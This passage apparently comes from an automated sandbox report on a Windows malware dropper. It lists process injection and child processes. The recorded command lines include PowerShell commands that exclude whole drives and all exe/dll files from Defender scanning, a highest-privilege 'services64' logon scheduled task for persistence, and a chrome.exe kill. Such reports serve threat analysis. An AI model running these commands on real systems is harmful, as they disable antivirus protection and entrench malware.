PID 1444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe
PID 1444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe
PID 1444 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe
PID 1444 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe
PID 1444 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe
PID 1444 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe
PID 1444 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe
PID 1444 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe
PID 1444 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime5.exe
PID 1444 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime5.exe
PID 1444 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime6.exe
PID 1444 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime6.exe
PID 1444 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime7.exe
PID 1444 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime7.exe
PID 1444 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime8.exe
PID 1444 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime8.exe
PID 1444 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
PID 1444 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
PID 1648 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\anytime3.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 1648 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\anytime3.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 1648 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\anytime3.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 3456 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\anytime4.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 3456 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\anytime4.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 3456 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\anytime4.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 5028 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\anytime1.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 5028 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\anytime1.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 5028 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\anytime1.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 1104 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\anytime2.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 1104 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\anytime2.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 1104 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\anytime2.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 732 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\anytime7.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 732 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\anytime7.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 732 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\anytime7.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 4216 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\anytime5.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 4216 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\anytime5.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 4216 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\anytime5.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 4440 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 4440 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 4440 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 2104 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe C:\Windows\SysWOW64\control.exe

Processes

C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

"C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe"

C:\Users\Admin\AppData\Local\Temp\inst1.exe

"C:\Users\Admin\AppData\Local\Temp\inst1.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe

"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe" -a

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"

C:\Users\Admin\AppData\Local\Temp\anytime4.exe

"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

"C:\Users\Admin\AppData\Local\Temp\anytime5.exe"

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4568 -ip 4568

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

"C:\Users\Admin\AppData\Local\Temp\anytime8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 796

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1032 -ip 1032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 1456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 832

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 580 -p 208 -ip 208

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1624 -s 1600

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 208 -s 1600

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1428 -s 1600

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 480 -p 1428 -ip 1428

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 576 -p 5032 -ip 5032

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 520 -p 1624 -ip 1624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3800 -ip 3800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1064 -ip 1064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4564 -ip 4564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1644 -ip 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4924 -ip 4924

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 836

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1036

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe

"C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4568 -ip 4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 968

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1080

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1292

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

